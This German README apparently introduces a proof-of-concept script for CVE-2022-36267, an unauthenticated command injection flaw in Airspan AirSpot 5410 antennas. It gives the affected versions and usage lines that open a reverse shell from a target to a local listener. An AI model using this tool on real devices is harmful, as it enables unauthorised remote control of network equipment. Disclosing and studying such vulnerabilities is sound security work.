
PoC-Skript für CVE-2022-36267: Nutzt eine nicht authentifizierte Remote-Befehlseinschleusungssicherheitslücke in der Airspan AirSpot 5410 Antenne aus.
Dieses Repository enthält ein Proof-of-Concept (PoC)-Reverse-Shell-Skript zur Ausnutzung von CVE-2022-36267, einer kritischen Schwachstelle in Airspan AirSpot 5410-Geräten. Das Skript ist eine praktische Demonstration, die die ausführliche Analyse im Blogbeitrag "Airspan AirSpot 5410 - Vulnerability Report" ergänzt.
Alle Airspan AirSpot 5410-Geräte ab Version 0.3.4.1-4 und darunter.
# Usage: python AirSpot-5410.py --RHOST <Target-IP> --RPORT <Target-Port> --LHOST <Local-IP> --LPORT <Local-Port>
# Example: python AirSpot-5410.py --RHOST 192.168.1.1 --RPORT 443 --LHOST 192.168.1.100 --LPORT 4444

NUR ZU BILDUNGSZWECKEN.